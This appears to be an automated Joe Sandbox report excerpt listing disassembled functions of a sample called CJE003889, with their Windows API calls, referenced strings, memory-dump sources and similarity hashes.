Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: a1fab4737500cf47c30d7b07dcd5aa6e679c98536a42dce902bc270059249c40
Instruction ID: d8a85cc18a2caa779a0f3ffdb930e14fb7741329e4872a873592dd699558b651
Opcode Fuzzy Hash: a1fab4737500cf47c30d7b07dcd5aa6e679c98536a42dce902bc270059249c40
Instruction Fuzzy Hash: 49316C32105298BBDF129F65DC49FEF3B69EF09320F110329FA25961A0C731D912DBA4

Function 00C86E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C86E3E

Part of subcall function 00C88B28: __getptd_noexit.LIBCMT ref: 00C88B28

__gmtime64_s.LIBCMT ref: 00C86ED7
__gmtime64_s.LIBCMT ref: 00C86F0D
__gmtime64_s.LIBCMT ref: 00C86F2A
__allrem.LIBCMT ref: 00C86F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C86F9C
__allrem.LIBCMT ref: 00C86FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C86FD1
__allrem.LIBCMT ref: 00C86FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C87006
__invoke_watson.LIBCMT ref: 00C87077

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 09e1ffc88ef66b734fe0d966893b67d1c8afd71db0a35470724b832a501c61bb
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 9C711776A00717ABDB14FE68DC85B6AB7A8AF0432CF14422AF524D7681FB70DE409794

Function 00CC2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC2542
GetMenuItemInfoW.USER32(00D25890,000000FF,00000000,00000030), ref: 00CC25A3
SetMenuItemInfoW.USER32(00D25890,00000004,00000000,00000030), ref: 00CC25D9
Sleep.KERNEL32(000001F4), ref: 00CC25EB
GetMenuItemCount.USER32(?), ref: 00CC262F
GetMenuItemID.USER32(?,00000000), ref: 00CC264B
GetMenuItemID.USER32(?,-00000001), ref: 00CC2675
GetMenuItemID.USER32(?,?), ref: 00CC26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CC2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC2735

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 33155058c7a27473fe8c6d1f55cff8426edb2e0435f7e14ceb94eeaabbb414ca
Instruction ID: 01478d88ac74b32f59a0464525b417ca8ea0bf8b6a7c13cfbc45b09da2a59a54
Opcode Fuzzy Hash: 33155058c7a27473fe8c6d1f55cff8426edb2e0435f7e14ceb94eeaabbb414ca
Instruction Fuzzy Hash: E8617B74900649AFDB21CF64D888FBEBBB8EB45304F14046DF852A7291D731AE46DB31

Function 00CE6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CE6FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CE6FA8
GetWindowLongW.USER32(?,000000F0), ref: 00CE6FCC
_memset.LIBCMT ref: 00CE6FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CE6FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CE7067

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 92091b28659597434d1f1841c022218276d893333664132e6a5f3ace7dd81e7f
Instruction ID: 3b3e8ab6e720d1c67211396852663ac02f4ab8c19f5c2f51490c4a6d312ec5a5
Opcode Fuzzy Hash: 92091b28659597434d1f1841c022218276d893333664132e6a5f3ace7dd81e7f
Instruction Fuzzy Hash: 35617B75900288AFDB21DFA5DC81EEE77F8EB08710F100159FA14EB2A1C771AE41DBA0

Function 00CB6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00CB6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00CB6C18
VariantInit.OLEAUT32(?), ref: 00CB6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00CB6C4A
VariantCopy.OLEAUT32(?,?), ref: 00CB6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00CB6CB1
VariantClear.OLEAUT32(?), ref: 00CB6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00CB6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CB6CDC
VariantClear.OLEAUT32(?), ref: 00CB6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CB6CF9

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 73b79424faf9e812ca015bd0e8c10ae305764beff4c8866c8586fb197392a5ae
Instruction ID: 040310bdcf36f09d781a89b48d3c56c908251e01f962ccd726248f047889f159
Opcode Fuzzy Hash: 73b79424faf9e812ca015bd0e8c10ae305764beff4c8866c8586fb197392a5ae
Instruction Fuzzy Hash: 744133759001199FDF10DFA4D884EEEBBB9EF48354F008079E955EB2A1CB34AA46DF90

Function 00CD83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC

CoInitialize.OLE32 ref: 00CD8403
CoUninitialize.OLE32 ref: 00CD840E
CoCreateInstance.OLE32(?,00000000,00000017,00CF2BEC,?), ref: 00CD846E
IIDFromString.OLE32(?,?), ref: 00CD84E1
VariantInit.OLEAUT32(?), ref: 00CD857B
VariantClear.OLEAUT32(?), ref: 00CD85DC

Strings

NULL Pointer assignment, xrefs: 00CD84B3
Invalid parameter, xrefs: 00CD84FA
Failed to create object, xrefs: 00CD8479, 00CD852F

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 9a55c1a3f224015cab0e61b098ff3a594c30ffee6ec8b9aca0a5090c5a09eda6
Instruction ID: 7a181d7a2e43e079f32b2ca7b8e5348c4ad0eb46f3f1f7b32a3fc18241e5e5d3
Opcode Fuzzy Hash: 9a55c1a3f224015cab0e61b098ff3a594c30ffee6ec8b9aca0a5090c5a09eda6
Instruction Fuzzy Hash: EE618970608312AFD710DF55D888B6EB7E8AF49754F00441EFA829B391DB70EE48DB92

Function 00CD5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00CD5793
inet_addr.WSOCK32(?,?,?), ref: 00CD57D8
gethostbyname.WSOCK32(?), ref: 00CD57E4
IcmpCreateFile.IPHLPAPI ref: 00CD57F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CD5862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CD5878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CD58ED
WSACleanup.WSOCK32 ref: 00CD58F3

Strings

Ping, xrefs: 00CD5816

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: c037e060aff4073ae97fa712cca4fa8959b167d47bd673bd20f46aa6829df994
Instruction ID: 179529ba0bfccc8abcb79a77dfca0f21d771499713a71cf1c6aed9b38eed9ef9
Opcode Fuzzy Hash: c037e060aff4073ae97fa712cca4fa8959b167d47bd673bd20f46aa6829df994
Instruction Fuzzy Hash: E9516C716447009FDB209F25DC85B6ABBE4EF48710F14452AFA66DB3E1DB30E905EB41

Function 00CCB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00CCB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CCB546
GetLastError.KERNEL32 ref: 00CCB550
SetErrorMode.KERNEL32(00000000,READY), ref: 00CCB5BD

Strings

READONLY, xrefs: 00CCB588
INVALID, xrefs: 00CCB58F
READY, xrefs: 00CCB596
UNKNOWN, xrefs: 00CCB575
NOTREADY, xrefs: 00CCB57C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 4f6eebbcf4c9d165e2006abcf8b2c355c874bb994d000e6f3d1913e62f19679f
Instruction ID: 294d45aaa1b307d2ae7f575c284c1d3f46bad057304a3bfef77026b14e084287
Opcode Fuzzy Hash: 4f6eebbcf4c9d165e2006abcf8b2c355c874bb994d000e6f3d1913e62f19679f
Instruction Fuzzy Hash: 9031AD35A00209EFCB10EBE8D986FAEBBB4FF48310F10812DE5119B291DB719E46DB50

Function 00CB8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

Part of subcall function 00CBAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00CBAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00CB9014
GetDlgCtrlID.USER32 ref: 00CB901F
GetParent.USER32 ref: 00CB903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00CB903E
GetDlgCtrlID.USER32(?), ref: 00CB9047
GetParent.USER32(?), ref: 00CB9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00CB9066

Strings

ListBox, xrefs: 00CB8FD1
ComboBox, xrefs: 00CB8F9C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 11a3b2f6f2da6452896d70e028d842f06ee836e2f1b4961fbc370b9211681096
Instruction ID: a592c7266d7847e1ef5de38b8ec32d5a25e5bb51b40e31fb49e2ccbad85a1047
Opcode Fuzzy Hash: 11a3b2f6f2da6452896d70e028d842f06ee836e2f1b4961fbc370b9211681096
Instruction Fuzzy Hash: 5421CF70A00148BBDF14ABA0CCC5FFEBB78EF59310F104119B961972A1DB79591AEA20

Function 00CB907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

Part of subcall function 00CBAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00CBAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00CB90FD
GetDlgCtrlID.USER32 ref: 00CB9108
GetParent.USER32 ref: 00CB9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00CB9127
GetDlgCtrlID.USER32(?), ref: 00CB9130
GetParent.USER32(?), ref: 00CB914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00CB914F

Strings

ListBox, xrefs: 00CB90BC
ComboBox, xrefs: 00CB9087

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 3d71918e05ba3997656e97dc96ec85f131bdba060dd65d08b5b44525c30f5b01
Instruction ID: 85934c398ad127d2ccffddb521298d08194af4db73aec95789c97f5179d7b898
Opcode Fuzzy Hash: 3d71918e05ba3997656e97dc96ec85f131bdba060dd65d08b5b44525c30f5b01
Instruction Fuzzy Hash: 6921C874A00148BBDF11ABA4CCC5FFEBB78EF48300F104119B551972A1DB79595AEB20

Function 00CB9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00CB916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00CB9184
_wcscmp.LIBCMT ref: 00CB9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CB9211

Strings

list, xrefs: 00CB91F3
largeicons, xrefs: 00CB91A5
details, xrefs: 00CB91BF
smallicons, xrefs: 00CB91D9
SHELLDLL_DefView, xrefs: 00CB9190

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: dd2bb9d27d3a5854f0f2818c6ee2df93ae9a098005eff15e2999eaa7aabb5bfa
Instruction ID: fc5b751363a9580baac8c43acbb6d8414e230ab85a77c17f10c4be47343fe9e0
Opcode Fuzzy Hash: dd2bb9d27d3a5854f0f2818c6ee2df93ae9a098005eff15e2999eaa7aabb5bfa
Instruction Fuzzy Hash: 4211203A6883577AFA213624EC0AEE737ACDB15720F200016FB10A40F1FE7159556A59

Function 00CD88AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00CD88D7
CoInitialize.OLE32(00000000), ref: 00CD8904
CoUninitialize.OLE32 ref: 00CD890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00CD8A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00CD8B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00CF2C0C), ref: 00CD8B6F
CoGetObject.OLE32(?,00000000,00CF2C0C,?), ref: 00CD8B92
SetErrorMode.KERNEL32(00000000), ref: 00CD8BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CD8C25
VariantClear.OLEAUT32(?), ref: 00CD8C35

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 1bdcd26ea8b61509ee031cfeab80e5735520c9ea9461054afadc40610f2ff1b1
Instruction ID: 8e53de7cebe94dbe501c266b5883d17f13c7f91f30abe5dd8c9c3f6666742e53
Opcode Fuzzy Hash: 1bdcd26ea8b61509ee031cfeab80e5735520c9ea9461054afadc40610f2ff1b1
Instruction Fuzzy Hash: B3C116B1604305AFD700DF65C88492BB7E9FF89748F00491EF6999B251DB71ED0ACB52

Function 00CC7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00CC7A6C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: e95cb02a09b9a8e65fe9412cdcb58e0a17df4566d0fadfb9f1fcd989ab6e4adb
Instruction ID: b4b34ebbd7d92f7f82f301ab01670dd40d606aa797ec4783bc3704d1a4324ef3
Opcode Fuzzy Hash: e95cb02a09b9a8e65fe9412cdcb58e0a17df4566d0fadfb9f1fcd989ab6e4adb
Instruction Fuzzy Hash: 27B18C7190421A9FDB00DFA5C894FBEB7B8EF09321F204569E511AB291D734EA41DF90

Function 00CC11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00CC11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC1204
GetWindowThreadProcessId.USER32(00000000), ref: 00CC120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00CC122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC12BC

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: fdbd5778d61df37a825660ee19b8550d567d97eeb82be877ff6ef71962e6f055
Instruction ID: c1c1ec1d01052df09f07a92dbb0d2a13fe0fb0d0f1a8be44b20154fe4a6a69b2
Opcode Fuzzy Hash: fdbd5778d61df37a825660ee19b8550d567d97eeb82be877ff6ef71962e6f055
Instruction Fuzzy Hash: C631AC79600304EBDF209F56ED88FAD37A9AF66311F19812DFD11CA2A1D7B49E418B60

Function 00C6FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C6FAA6
OleUninitialize.OLE32(?,00000000), ref: 00C6FB45
UnregisterHotKey.USER32(?), ref: 00C6FC9C
DestroyWindow.USER32(?), ref: 00CA45D6
FreeLibrary.KERNEL32(?), ref: 00CA463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CA4668

Strings

close all, xrefs: 00C6FAA1

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 901ec510a184d8928ff0692902f4c7da3b776ed714c5c9e644261de13fd959aa
Instruction ID: b6ab93cdabb2cb116c2a76895f83ca3ebeeb5d5bdb94a754afab7fb1ab60155b
Opcode Fuzzy Hash: 901ec510a184d8928ff0692902f4c7da3b776ed714c5c9e644261de13fd959aa
Instruction Fuzzy Hash: FEA16B30701212DFCB29EF14D9A5B69F364BF56704F1442ADE81AAB262CB70AD17DF50

Function 00CBA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00CBA439), ref: 00CBA377

Strings

NAME, xrefs: 00CBA1A9
INSTANCE, xrefs: 00CBA285
TEXT, xrefs: 00CBA2AE
CLASS, xrefs: 00CBA0F6
CLASSNN, xrefs: 00CBA119
REGEXPCLASS, xrefs: 00CBA13C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
